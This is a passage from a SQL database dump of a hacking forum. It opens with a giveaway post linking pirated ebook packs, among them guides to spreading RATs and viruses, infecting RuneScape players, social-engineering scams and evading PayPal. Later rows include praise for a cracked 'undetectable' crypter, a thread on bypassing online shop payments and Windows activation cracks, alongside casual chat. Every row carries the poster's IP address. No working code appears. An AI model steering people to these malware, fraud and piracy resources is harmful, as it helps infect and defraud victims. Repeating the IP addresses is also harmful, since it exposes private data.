Dummies\r\nHacking Gmail Guide\r\nHoneypots - Tracking Hackers (2002)\r\nThe Art Of Intrusion - The Real Stories Behind The Exploits Of Hackers, Intruders, And Deceivers (2005)\r\nThe Hacker’s Underground Handbook\r\nThe Shellcoders Handbook\r\nFirefox Hacks - Tips & Tools For Next-Generation Web Browsing (2005)\r\nGoogle Hacking For Penetration Testers (2005)\r\nGoogle Hacks, 3rd Edition (2006)\r\nHacker Web Exploitation Uncovered\r\nWeb Hacking - Attacks And Defense (2002)[/spoiler]\r\n\r\n\r\n[url=http://www.mediafire.com/?2ybm6t67br38uwu]Network Programming (67 MB)[/url]\r\n[spoiler]\r\nIllustrated TCP-IP - A Graphic Guide To The Protocol Suite (1999)\r\nPrentice Hall - Internetworking with TCP-IP, Volume I - Principles, Protocols and Architecture, 4rd Ed [Comer, Scan, OCR] - 2000 - (By Laxxuss)\r\nPrentice Hall - Internetworking with TCPIP - Vol 3 Client-Server Programming and Applications for the BSD Sockets Version\r\nTcp Ip For Dummies\r\nTCP-IP Foundations (2004)\r\nTCP-IP Network Administration, 3rd Edition (2002)\r\nTCPIPSettingsinDOS\r\nTCPIPTools\r\nUnderstanding TCP-IP (2006)\r\nUnix Network Programming - Volume I - The Sockets Networking API, 3rd Edition (2003)[/spoiler]\r\n\r\n\r\n[url=http://www.mediafire.com/?11igyosyfn4nsko]Network Security (64 MB)[/url]\r\n[spoiler]\r\nCryptography And Network Security, 4th Edition (2005)\r\nDesigning And Implementing Linux Firewalls And QoS (2006)\r\nFirewall Policies And VPN Configurations (2006)\r\nFundamentals of Network Security\r\nLANSecurity\r\nMaximum Computer Security-A Hacker\'s Guide to Protecting Your Internet Site and Network\r\nMcGraw Hill - Hacking Exposed - Network Security, Secrets and Solutions, 3rd Ed\r\nNetwork Security Assessment - From Vulnerability To Patch (2006)\r\nNetwork Security Hacks - 100 Industrial-Strength Tips & Tools, 1st Edition (2004)\r\nNetwork Security With OpenSSL (2002)\r\nSelf-Defending Networks - The Next Generation Of Network Security (2006)[/spoiler]\r\n\r\n\r\n[url=http://www.mediafire.com/?g2v5dn9in1dn5cr]Programming Part 1 (144 MB)[/url]\r\n[url=http://www.mediafire.com/?m6tb69oet9yt19n]Programming Part 2 (90 MB)[/url]\r\n[spoiler]\r\nLearning PHP & MySQL (2006)\r\nMichael - Mastering UNIX Shell Scripting (Wiley, 2003)\r\nHacker Disassembling Uncovered\r\nC For Dummies\r\nC Game Programming For Dummies\r\nVisual Studio NET C# For Dummies - Quick Reference Guide\r\nC By Example (1999)\r\nC In A Nutshell (2005)\r\nC Primer Plus, 5th Edition (2004)\r\nC-C++ Programmer\'s Reference, 3rd Edition (2003)\r\nCryptography In C And C++ (2001)\r\nEffective C++, 3rd Edition (2005)\r\nOptimizing C++ (1999)\r\nProgramming Embedded Systems In C And C++ (1999)\r\nSecure Programming Cookbook For C And C++ (2003)\r\nBeginning C++ Game Programming\r\nC++ A Beginners Guide - Herbert Schildt\r\nC++ By Dissection\r\nC++ For Dummies\r\nC++ For Mathematicians - An Introduction For Students And Professionals\r\nC++ From The Ground Up, 3rd Edition\r\nC++ Plus Data Structures, 3rd Edition\r\nC++ Timesaving Techniques For Dummies\r\nMicrosoft Visual Studio C++ 6 For Dummies - Quick Reference Guide\r\nVisual Studio NET C++ For Dummies - Quick Reference Guide\r\nYou Can Program In C++ - A Programmers Introduction\r\nBeginning Java Programming for Dummies\r\nJava 2 for Dummies Original Eddition_2\r\nJava For Dummies\r\nAssembly Language Step-By-Step - Programming With DOS And Linux, 2nd Edition (2000)\r\nBeginning Linux Programming\r\nBurtch - Linux Shell Scripting with Bash (2004)\r\nGlass,Ables - Linux for Programmers and Users (Prentice, 2006)\r\nGuide To Assembly Language Programming In Linux (2005)\r\nKorn Shell Unix and Linux Programming Manual, 3rd ed 2001\r\nMatthew - Beginning Linux Programming 4e (Wrox, 2007)\r\nMitchell - Advanced Linux Programming (New Riders, 2001)\r\nWall - Linux Programming Unleashed (SAMS, 1999)\r\nAdvanced Perl Programming, 2nd Edition (2005)\r\nBeginning Perl Web Development - From Novice To Professional (2006)\r\nIntermediate Perl (2006)\r\nLearning Perl Objects, References, & Modules (2003)\r\nLearning Perl, 4th Edition (2005)\r\nMinimal Perl For UNIX And Linux People (2005)\r\nPerl Best Practices (2005)\r\nPerl Cookbook\r\nPerl Hacks - Tips And Tools For Programming Debugging And Surviving (2006)\r\nPerl Medic - Transforming Legacy Code (2004)[/spoiler]\r\n\r\n\r\n[url=http://www.mediafire.com/?pd8ld2um8vcckm8]SQL (67 MB)[/url]\r\n[spoiler]\r\nMastering_MySQL_4.2003.Sybex\r\nMySQL - 2nd Edition (Sams)\r\nMySQL - Essential Skills (2004)\r\nMySQL - Visual QuickStart Guide, 2nd Edition (2006)\r\nMySQL Certification Study Guide (2004)\r\nMySQL Cookbook (2002)\r\nMySQL Cookbook\r\nMySQL Pocket Reference (2003)\r\nMySQL Tutorial (2003)\r\nMySQL.PHP.Database.Applications\r\nSQL - A Beginner\'s Guide, 2nd Edition (2003)\r\nSQL - Practical Guide For Developers (2005)\r\nSQL Bible (2003)\r\nSQL Cookbook (2005)\r\nSQL For Dummies, 6th Edition (2006)\r\nSQL Sams Teach Yourself MySQL in 21 Days -- SAMS\r\nSQL Server 2000\r\nSQL Injection Attacks And Defense\r\nSQL Injection eBook\r\nSQL Injection\r\nAdvance Injection[/spoiler]\r\n\r\n\r\n[url=http://www.mediafire.com/?9ucp3ir85za6f6c]Unix (58 MB)[/url]\r\n[spoiler]\r\nAbsolute BSD - The Ultimate Guide To FreeBSD (2002)\r\nAbsolute OpenBSD - Unix For The Practical Paranoid 2003\r\nEmbedded FreeBSD Cookbook (2002)\r\nLearning the UNIX Operating System 4th ed 1998\r\nMastering FreeBSD And OpenBSD Security (2005)\r\nSysAdmin - Security Tools in FreeBSD\r\nTeach Yourself FreeBSD In 24 Hours (2003)\r\nThe Complete FreeBSD, 4th Edition (2003)\r\nThe OpenBSD 4.0 Crash Course (2007)\r\nUnix Power Tools, 3rd Edition (2002)\r\nlinuxKernelSux\r\nOReilly.Understanding.The Linux Kernel 1st Edition\r\nUnderstanding The Linux Kernel, 3rd Edition (2005)\r\nA Practical Guide To Linux Commands, Editors, And Shell Programming (2005)\r\nGet_Acquainted_with_Linux_Security_and_Optimization_System\r\nHack Proofing Linux - A Guide To Open Source Security (2001)\r\nLinux Basic Commands\r\nLinux Kernel Development, 2nd Edition\r\nLinux Kernel module programming guide 1\r\nLinux Shell Scripting With Bash (2004)\r\nLinux_Administration_Made_Easy\r\nLinux_Administrators_Security_Guide\r\nMcGraw.Hill.HackNotes.Linux.and.Unix.Security.Portable.Reference.eBook-DDU\r\nOReilly - Linux_Network_Administrator\'s_Guide_Second_Edition\r\nSam teach you Linux in 24 hours\r\nSecuring Linux A Survival Guide for Linux Security Version 1.0 2003\r\nSecuring Linux Servers for Service Providers\r\nSELinux (2004)\r\nshell-scripting\r\ntcsh\r\nUnix Shell Programming, 3rd Edition (2003)[/spoiler]\r\n\r\n\r\n[url=http://www.mediafire.com/?augpbbaydqv9r8l]Windows XP (13 MB)[/url]\r\n[spoiler]\r\nHacking Windows XP\r\nHardcore Windows XP[/spoiler]\r\n\r\n\r\n[url=http://www.mediafire.com/?iq0o6hp2zouoper]For Dummies (69 MB)[/url]\r\n[spoiler]\r\nBuilding Flash Web Sites\r\nBuilding Your Business With Google For Dummies\r\nBuilding Your Own Home For Dummies\r\nChinese For Dummies\r\nLogic For Dummies\r\nMusic Composition For Dummies\r\nMusic Theory For Dummies\r\nTrigonometry Workbook For Dummies\r\nWeb Design For Dummies[/spoiler]\r\n\r\n\r\n[url=http://www.mediafire.com/?igrye5npwzbmklb]How to Spread Your RAT and/or Virus (3 MB)[/url]\r\n[spoiler]\r\nBeginner Spreading Guide\r\nSpreading eBook\r\nTorrent Spreading Ebook\r\nProject Spread\r\nRunescape Spreading 1\r\nRunescape Spreading 2\r\nSpreading Methods\r\nTargeted Spreading and How to Keep Them[/spoiler]\r\n\r\n\r\n[url=http://www.mediafire.com/?w3e1y1s1q4tu74z]Moneymaking SMALL PACK (20 MB)[/url]\r\n[spoiler]\r\nGuide To Making Money Online\r\n75$ A Day With Autopilot\r\nExploit An Online Casino For Constant Cash\r\n$2300 In 3 Days Using Twitter Traffic\r\nClickBank Method\r\nMake $100 Per Day\r\nMake $50 Day In 10mins With EnviroFile and Linkbucks\r\nEasy $300\r\n20 Ways To Make $100 Per Day Online\r\nBulking Up - A Wealthy Lifestyle\r\nMake Money Online With Files-Cashout\r\nMake Money On Hotfile\r\nProxy Money Making Guide\r\nOne Click Money\r\nWhat Is Neobux And How Do You Manage Referrals\r\nEarn $100-200+ A Day\r\n4k-in-a-day\r\nFileIceGuide\r\nMoneyMachineV1.0 \r\nPayPal Machine\r\nThe Online Money Maker\r\nUltimate Cash Machine 400$ + Daily\r\n4 Ways To Find The Perfect Niche\r\nGood niches\r\nHow To Setup Your CPA Niche\r\nAmazon EBook\r\nClassy Money\r\nCommission System\r\nNeobux Basics\r\nPayPal Booster\r\nSuper Fast List Building\r\nTwitter Basics For Internet Marketers\r\nViral Traffic\r\nAmazing Sharecash Method [$30+ a Day]\r\nDominating ShareCash - 10 Ways\r\nDominating ShareCash\r\nEarn $300 A Day - Sharecash\r\nEarn $300 Per Day Online\r\nHow To Conquer Sharecash For Newbies - $100-300 Daily\r\nHow To Earn $50 A Day With Sharecash\r\nShareCash Secrets From X-STARK\r\nThe Insane Sharecash Guide\r\n[/spoiler]\r\n\r\n\r\n[url=http://www.mediafire.com/?oh2ot8qd5gtqzqd]Moneymaking LARGE PACK (196 MB)[/url]\r\n[spoiler]\r\nThis file has too many titles to list. It literally has everything you could possibly need and more. Enjoy!\r\n[/spoiler]\r\n\r\n\r\n[url=http://www.mediafire.com/?k46x77a6z52o7gw]Social Engineering (64 MB)[/url]\r\n[spoiler]\r\nPropaganda-and-Mass-Persuasion\r\nArt of War PDF\r\nHow to influence people and win friends\r\nKevin Mitnick - The Art of Intrusion\r\nRobert Greene, The 48 Laws of Power\r\nSocial_Engineering__The_Art_of_Human_Hacking\r\nThe Art of Human Hacking\r\nThe Complete Idiots Guide to Persuasion\r\nThe Power Of Persuasion\r\nThe Science Of Influence\r\nGet Anyone to do Anything\r\nThe Great book of SE\r\nSE Alienware\r\nSE Kindle Fire\r\nSE Logitech\r\nSE McDonalds\r\nSE Kindle Fires and DX\r\nFree Games From BlockBuster\r\nFree Subway for Life\r\nHow to Get a Free Whopper\r\nSE Nike Fuel Bands\r\nHow to Get Free Stuff From eBay[/spoiler]\r\n\r\n\r\n[url=http://www.mediafire.com/?cvpsyf2hapi22ff]RuneScape (69 MB)[/url]\r\n[spoiler]\r\nA Guide to infecting RS players\r\nBillabong\'s Lure Method\r\nFreeMembership\r\nHow to Get RS IPs\r\nRunescape Recovering Resources\r\nRuneScape Recovery Guide\r\nRunescapeIPGuide\r\nShads Billionaires Guide v7\r\nRuneScape Gold Monetizing Method\r\nTehRunescapeGuide\r\nShads Billionaires Guide v8\r\n200K Per Hour Melee Combat EXP Guide\r\nRunescape Gold Strategy Guide[/spoiler]\r\n\r\n\r\n[url=http://www.mediafire.com/?2tkaqbhrst7wzsa]PayPal (916 KB)[/url]\r\n[spoiler]\r\nUltimate PayPal Guide\r\nPaypal In Your Pocket\r\nPaypal Hell\r\nHow to Hide From PayPal\r\nPaypal Get Accepted for Free\r\nPayPal Verification US[/spoiler]\r\n\r\n\r\n[url=http://www.mediafire.com/?4e3i91m0gbwt2q4]YouTube (558 KB)[/url]\r\n[spoiler]\r\nHow To Get Massive Youtube Traffic\r\nYoutube eBook\r\nMaking Money From Youtube[/spoiler]\r\n\r\n\r\n[url=http://www.mediafire.com/?4sz9u1qa7af87dr]40 SparkCharts (Highly Recommended) (113 MB)[/url]\r\n[spoiler]\r\nAbnormal Psychology\r\nAfrican-American History\r\nAlgebra I\r\nAmerican Sign Language\r\nAnthropology\r\nAstronomy\r\nBiology\r\nCalculus I\r\nCalculus II\r\nCalculus Reference\r\nChemistry\r\nDistance Learning\r\nEnvironmental Studies\r\nESL and EFL Grammar\r\nEuropean History\r\nFrench Grammar\r\nFrench Vocabulary\r\nJava\r\nLatin Grammar\r\nMacroeconomics\r\nMicrobiology\r\nMicroeconomics\r\nOrganic Chemistry I\r\nOrganic Chemistry II\r\nPhilosophy\r\nPhysics\r\nPoetry\r\nShakespeare\r\nSociology\r\nSpanish Grammar\r\nSpanish Idioms\r\nSpanish Verbs\r\nSpanish Vocabulary\r\nSpark Catalouge\r\nStudy Tactics\r\nThe Bible\r\nUS History - Pre Columbian - 1865\r\nWestern Art History\r\nWomen\'s Studies\r\nWorld History[/spoiler]\r\n\r\n\r\n[url=http://www.mediafire.com/?3czwdw0agn7xipx]A Selection of Childrens Books (14 MB)[/url]\r\n[spoiler]\r\nAdams, Richard - Watership Down\r\nBeagle, Peter S - The Last Unicorn\r\nCarroll, Lewis - Alice\'s Adventures in Wonderland (illustrated)\r\nCarroll, Lewis - Through the Looking-Glass (illustrated)\r\nGaiman, Neil - Coraline (2002, cover)\r\nGoldman, William - The Princess Bride\r\nGraham, Kenneth - The Wind in the Willows\r\nMilne, A.A. - The House at the Pooh Corner\r\nMilne, A.A. - Winnie-the-Pooh\r\nNorton, Juster - The Phantom Tollbooth (illustrated)\r\nNorton, Mary - Bed-Knob and Broomstick\r\nNorton, Mary - The Borrowers\r\nSaint Exupery, Antoine de - The Little Prince (illustrated)\r\nSalten, F. - Bambi\r\nSmith, Betty - A Tree Grows in Brooklyn\r\nSteinbeck, John - The Red Pony\r\nWhite, E.B. - Charlotte\'s Web[/spoiler][/align]\r\n\r\n[align=center][color=#FFA500][size=xx-large]I wish you all the best with my giveaways. \r\nI sincerely hope that they can benefit you in some way or another.[/size][/align][/color]\r\n\r\n[color=#1E90FF][align=center][size=x-large]Please let me know if any links are broken or incorrectly placed!\r\nIf you think this thread is awesome, keep it alive![/size][/align][/color]\r\n\r\n[color=#FF4500][align=center][size=x-large]Post more cool giveaways below![/size][/align][/color]\r\n\r\n[align=center][spoiler][size=x-small]Every file made available on this thread is for educational purposes only. They should in no way be used for illegal or blackhat activity. I do not claim ownership of any of these files.[/size][/spoiler][/align]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '81bf75589b7d8f0969de5fd0f273ff62', '0', '0'); INSERT INTO mybb_posts VALUES('2766', '547', '2757', '19', 'RE: Collection Of Skype Resolvers', '0', '203', 'NeonLights', '1348870083', '[quote=\'NXK\' pid=\'2757\' dateline=\'1348868704\']\r\nMy skype resolver had a adf.fly link I didn\'t give permission to re leak with out it. And my skype resolver it down.\r\n[/quote]\r\n\r\no sorry :S\r\nil remove the link?', '67.68.72.99', '1128548451', '1', '0', '0', '0', '1', '8200db4f6906eafcf8915b222d2cbc32', '0', '0'); INSERT INTO mybb_posts VALUES('2769', '558', '0', '33', 'Guess this font?', '0', '82', 'iTzIpod', '1348883452', 'I wanna try to make a Cloud Strife signature. Which I know is gonna turn out [b]HORRIBLE[/b. But oh well.\r\nAnd to do so, I need to know what this font is called :3\r\n\r\nI will rep you (if I can), or, I will give you a spot in Unique. (But you can get kicked)\r\n\r\n[img]http://i224.photobucket.com/albums/dd214/GenisSage91/CloudStrifeSig.jpg[/img]\r\n\r\nPlease help me find out what that font is called.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4ce55740717d137862f29d2b944c2ef5', '0', '0'); INSERT INTO mybb_posts VALUES('2770', '538', '2732', '63', 'RE: Staff userbar', '0', '1', 't3h jok3r', '1348888359', 'LOL well you do have a point, I think you should ask reloadzor for a userbar directly. If we get a better userbar then I have no problem but must look good with the stars and/or username color.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a9dca6a6919ffcb554ff25ef270141b4', '0', '0'); INSERT INTO mybb_posts VALUES('2771', '539', '2736', '4', 'RE: YO WHAT UP!', '0', '1', 't3h jok3r', '1348888381', 'Welcome to L33THacking, I\'m the one who referred you. Thanks for joining.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '35d12ccac37c9caa6c48dcf1a072375e', '0', '0'); INSERT INTO mybb_posts VALUES('2778', '449', '2074', '35', 'RE: Kratos God Of War Signature/Tag', '0', '2', 'Apathy', '1348888995', 'Sorry man I am not hating I am trying to help you improve. Also I wrote have and it auto corrected to jaw. So if you ever see random words it is auto correct.', '173.206.129.154', '-1378975334', '0', '0', '0', '0', '1', '3deefb7ecc5b2caea53c49cdd685ebb6', '0', '0'); INSERT INTO mybb_posts VALUES('2773', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '1', 't3h jok3r', '1348888515', 'Damn then that\'s cool. I don\'t think we would have any problems. Thanks for helping out LH.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f961ad20b3991c78fd1ce5a86c63df74', '0', '0'); INSERT INTO mybb_posts VALUES('2774', '98', '233', '20', 'RE: FREE UD RazorCrypter (Cracked)', '0', '203', 'NeonLights', '1348888588', 'holy shit amazing release!!! :D! dont release this anywhere else then here', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '4a2d1b9841f92eb6e9fe1e4d66aa181b', '0', '0'); INSERT INTO mybb_posts VALUES('2775', '514', '2674', '9', 'RE: How to make serious money', '0', '1', 't3h jok3r', '1348888604', '[quote=\'iTzIpod\' pid=\'2674\' dateline=\'1348746820\']\r\n[quote=\'p420\' pid=\'2616\' dateline=\'1348679861\']\r\nNice method but when I click on buy now on the website, it opens the outlook mail program on my PC.\r\n[/quote]\r\n\r\nI don\'t know why it does that. I would love to help but I don\'t know.. \r\n\r\nIf possible, try uninstalling the outlook. (If you want) \r\nOr disable it if possible.\r\n[/quote]\r\n\r\nWhen you click on buy now what happens?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '13d06842c8ba659439080f9eef91e498', '0', '0'); INSERT INTO mybb_posts VALUES('2776', '490', '2381', '49', 'RE: Forum Suggestion', '0', '1', 't3h jok3r', '1348888737', 'Cool, I\'ll add these sections soon. Post your favorite games.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '508dc69d2b41ea682aa2e159ec7770a0', '0', '0'); INSERT INTO mybb_posts VALUES('2777', '537', '2710', '12', 'RE: [Very Hot!] How to bypass online shop payment! [Video]', '0', '2', 'Apathy', '1348888827', 'Great share thanks man. :)', '173.206.129.154', '-1378975334', '0', '0', '0', '0', '1', '9d0a161e7959696f35d12179ab324541', '0', '0'); INSERT INTO mybb_posts VALUES('2779', '551', '2759', '61', 'RE: Dexter\'s Thread Design', '0', '2', 'Apathy', '1348889144', 'Nice share I might download later. Pretty clean.', '173.206.129.154', '-1378975334', '0', '0', '0', '0', '1', '8ad9be41b2a7a347d38505a05955b860', '0', '0'); INSERT INTO mybb_posts VALUES('2780', '528', '2653', '7', 'RE: [Milestone] Reached 700 posts', '0', '1', 't3h jok3r', '1348890308', 'L33THacking is growing and thanks to everyone on LH for participating.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a5d919c4bc0633e3da9fedbdb5c39078', '0', '0'); INSERT INTO mybb_posts VALUES('2781', '559', '0', '3', 'Upgrade Price Lowered', '0', '1', 't3h jok3r', '1348890531', 'I was thinking about the upgrade system and I personally think $10 for a small site like LH is too much so I lowered it down to $5.\r\n\r\nIf you are looking forward to buy an upgrade and need a review if the upgrade is worth it or not then feel free to contact any Elite Member.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '1d8b514c01060536b969f4bc28e85393', '0', '0'); INSERT INTO mybb_posts VALUES('2782', '536', '2686', '4', 'RE: Hey everyone!', '0', '5', 'Timmy', '1348891314', 'Welcome to L33THacking bro.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'e362b6bf97487cc0d84fd1bca9dd040c', '0', '0'); INSERT INTO mybb_posts VALUES('2783', '539', '2736', '4', 'RE: YO WHAT UP!', '0', '5', 'Timmy', '1348891350', 'Welcome to l33thacking and oh hell yeah my son got some pussy.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd4bc54ae545b2eab2a166d9d04d16111', '0', '0'); INSERT INTO mybb_posts VALUES('2784', '558', '2769', '33', 'RE: Guess this font?', '0', '5', 'Timmy', '1348891569', 'It\'s hard to determine unless you can find someone who is really good at photoshop and likes using different fonts.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '09db48f0c1b05586cfc0eb9a2f900045', '0', '0'); INSERT INTO mybb_posts VALUES('2785', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '5', 'Timmy', '1348891618', 'The new userbar looks nice thaks op', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f41bcac6fc6a904a4417c0f27187aa6a', '0', '0'); INSERT INTO mybb_posts VALUES('2786', '534', '2670', '23', 'RE: Manually Removing Viruses Through System Registry', '0', '5', 'Timmy', '1348891789', 'Nice tutorial very easy to follow. Will come in handy some day.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'bd4a2e51173e5249ce23baf21e49817e', '0', '0'); INSERT INTO mybb_posts VALUES('2787', '535', '2677', '14', 'RE: Proxy list', '0', '5', 'Timmy', '1348891912', 'Nice list. Most seem to work thanks.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6a24e0af5ccc8314b1530ca454b5fd7c', '0', '0'); INSERT INTO mybb_posts VALUES('2788', '560', '0', '24', 'Windows 7 Official direct downloads', '0', '205', 'mothered', '1348895056', 'Greetings to all,\r\n\r\nHere\'s the Official download for Windows 7, In ISO format and fully bootable. Please note that only the \"Professional\" and \"Home Premium\" editions are operative, In both the x86 and 64 bit architectures.\r\nIf you do require activation, just use the Windows 7 Loader by Daz.\r\n\r\nLink: http://www.mydigitallife.info/download-windows-7-iso-official-32-bit-and-64-bit-direct-download-links/\r\n\r\nCheers.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '33c77e4d1d328a6c9e4c8bb164e30e4e', '0', '0'); INSERT INTO mybb_posts VALUES('2789', '528', '2653', '7', 'RE: [Milestone] Reached 700 posts', '0', '205', 'mothered', '1348895185', 'That\'s quite an achievement In such a short space of time mate.\r\n\r\nCongratz, and well done :)', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '13c9d57662f7b8dccce307765c4eee1d', '0', '0'); INSERT INTO mybb_posts VALUES('2790', '561', '0', '24', 'What Antivirus are you running and why?', '0', '205', 'mothered', '1348895341', 'Greetings L33thacking,\r\n\r\nWhat Antivirus are you running and \"why\". Please elaborate on your choice.\r\n\r\nI\'m running Norton AV 2012. My reasons:\r\n\r\n** Symantec have significantly Improved It\'s products, hence from 2010 onwards, Norton Is very light on system resources. \r\n**It\'s \"Sonar\" protection Is an excellent defense mechanism that works on a \"Heuristic Analysis\" methodology (viruses that are not defined In the vendors database definitions), hence Is able to detect most newly-developed malicious content.\r\n** It\'s \"Pulse Updates\" periodically performs live definition updates, thus no requirement for user-Intervention.\r\n** The \"Norton Safe Web\" or Site Safety actively monitors a given site(s), and displays the safety rating prior to entering the site.\r\n** The \"Norton Background Tasks\", autonomously performs system scans, thus keeping your system free from malicious content at all times.\r\n\r\nThere\'s heaps more, but I\'ve just documented the priorities.\r\n\r\nHow about you guys?\r\n\r\nEdit: typed too fast, hence grammatical error corrected.', '210.50.40.19', '-768464877', '1', '0', '205', '1348895408', '1', 'e0f15b4d1e888f1ddd186166f4e8ed1e', '0', '1348895408'); INSERT INTO mybb_posts VALUES('2791', '562', '0', '7', 'World\'s Longest Email Address', '0', '205', 'mothered', '1348895544', 'Hey guys,\r\n\r\nHere\'s a site whereby you can create a really long email address. Whether you do It for a laugh, or just to annoy someone, It\'s certainly quite cool.\r\n\r\nLink: http://www.abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijk.com/', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '93df68f6f0eac027261b065ac557c1b2', '0', '0'); INSERT INTO mybb_posts VALUES('2792', '563', '0', '25', 'Virus Removal Tools', '0', '205', 'mothered', '1348895920', 'Greetings everyone,\r\n\r\nHere\'s a few virus removal tools, that are certainly worth keeping on hand. Now they don\'t replace your current AV, but more so can be used to remove malicious content that your Antivirus failed to detect.\r\n\r\nKaspersky: http://www.kaspersky.com/virus-removal-tools\r\nAvira AntiVir: http://www.avira.com/en/support-download-avira-antivir-removal-tool/product/\r\nAvast: http://www.avast.com.au/utilities/virus-cleaner\r\nMcAfee Stinger: http://www.mcafee.com/au/downloads/free-tools/stinger.aspx\r\n\r\nCheers.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '593d4cdc5b01ed9b23813014cafe64b8', '0', '0'); INSERT INTO mybb_posts VALUES('2793', '564', '0', '7', 'What Do You Do To Relax?', '0', '205', 'mothered', '1348896086', 'Greetings L33thacking,\r\n\r\nWith all our day to day computational stuff going on, It can get pretty Intense, so what do you do to relax and take time out?\r\n\r\nI tend to watch some funny YouTube videos, and go for a walk to refresh.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'e68f528d5bf353db0e3adf601c078f52', '0', '0'); INSERT INTO mybb_posts VALUES('2794', '534', '2670', '23', 'RE: Manually Removing Viruses Through System Registry', '0', '205', 'mothered', '1348896492', 'It\'s good that you mentioned to backup the Registry, prior to any editing.\r\n\r\nGiven that It\'s a critical part of the O/S, any Incorrect deletion of critical keys and values, can cause significant system Instability, and/or loss of functionality. \r\n\r\nExcellent point too, that not all viruses create a Registry entry.\r\nAn overall great tut, well done.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'c4cc01310a7690896bbd643b0949e495', '0', '0'); INSERT INTO mybb_posts VALUES('2795', '551', '2759', '61', 'RE: Dexter\'s Thread Design', '0', '82', 'iTzIpod', '1348920875', 'Thanks. No problem. Just trying to contribute! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fef2f471972121eb5a8ef6cbc5e7b044', '0', '0'); INSERT INTO mybb_posts VALUES('2796', '559', '2781', '3', 'RE: Upgrade Price Lowered', '0', '82', 'iTzIpod', '1348920964', 'Nice update. You got a point. When L33tHacking becomes big, lets try making it $10 again. And then maybe $15. \n\n\nUpgrade Section is kinda dead right now. So it\'s not really worth it at the moment. Unless we gain a lot more active members that will post HQ stuff.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2f512d33fc8754aefae182721081269c', '0', '0'); INSERT INTO mybb_posts VALUES('2797', '558', '2769', '33', 'RE: Guess this font?', '0', '82', 'iTzIpod', '1348921028', 'Yeah but I was just trying to see if any of our members know what font this is.. So..\n\nI\'ll try to ask Dafont.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '59e9848f04db6ec8a7e69e056c99375e', '0', '0'); INSERT INTO mybb_posts VALUES('2798', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '82', 'iTzIpod', '1348921095', '@Reloadzor, good enough. :p I guess you got a point. I had that issue before and didn\'t know why. Thanks for the Userbar though. I\'m glad you\'re Unique.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'adaac299518645088774addb9e0c6fc2', '0', '0'); INSERT INTO mybb_posts VALUES('2799', '528', '2653', '7', 'RE: [Milestone] Reached 700 posts', '0', '82', 'iTzIpod', '1348921158', 'Thanks everyone! Trying to go for 800, then 900, and then 1,000 ! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd05f9d3b56c3233b1f507ae855b5fa26', '0', '0'); INSERT INTO mybb_posts VALUES('2800', '561', '2790', '24', 'RE: What Antivirus are you running and why?', '0', '82', 'iTzIpod', '1348921236', 'I use MalwareBytes, and Norton 360. Don\'t really have any reason. Because I just wanna be \"Safe\" :p\n\n\nUh. I also don\'t download much programs. And if I do, I run it in Sandboxie in case.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ecc63444819905bfda0387cf1dd96502', '0', '0'); INSERT INTO mybb_posts VALUES('2801', '562', '2791', '7', 'RE: World\'s Longest Email Address', '0', '82', 'iTzIpod', '1348921310', 'Seems legit. :p But I don\'t feel like owning 17 emails now :p \n\n\nMy brain is gonna die if I keep too many passwords in there. I\'m serious..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'aa5891b94ab662e5c50f580f11cc3c63', '0', '0'); INSERT INTO mybb_posts VALUES('2802', '564', '2793', '7', 'RE: What Do You Do To Relax?', '0', '82', 'iTzIpod', '1348921401', 'I just play some video games. (PS3 CoD)\nOr, play some computer games such as Minecraft, LoL, etc.\n\nOr, hang out on Skype talk to my friends.\nOr talk to my friends on facebook.\nCall some people.\nParty\nDo homework? :p (School days/Weekdays I guess) Since I have to finish it.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7453a2cbc1597c82acd362c0fe956be7', '0', '0'); INSERT INTO mybb_posts VALUES('2803', '494', '2406', '42', 'RE: Chinese Man Has Lived on Water Alone for the Last 12 Years', '0', '205', 'mothered', '1348921694', 'What an amazing story.\r\n\r\nWho knows whether It\'s factual. I personally can\'t see anyone living on water alone, for that period of time.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '846259da1c6853f3c7463a0ff519925c', '0', '0'); INSERT INTO mybb_posts VALUES('2945', '190', '665', '56', 'RE: Copy and paste game', '0', '199', 'Anonymous™', '1348993673', 'Hello ***** ******\n\nWe have completed our investigation of the transaction below and were\nunable to find evidence of unauthorized access to the buyer’s account. This\ncase was denied to the buyer and no funds were recovered from your account.', '85.230.50.38', '1441149478', '1', '0', '0', '0', '1', 'fa7a0c70de6e4c2ca66a53cc783e7ed2', '0', '0'); INSERT INTO mybb_posts VALUES('2805', '266', '1186', '47', 'RE: Win a Free Netflix Account~', '0', '100', '??zg???g????61', '1348924769', 'Lol it seems like me and 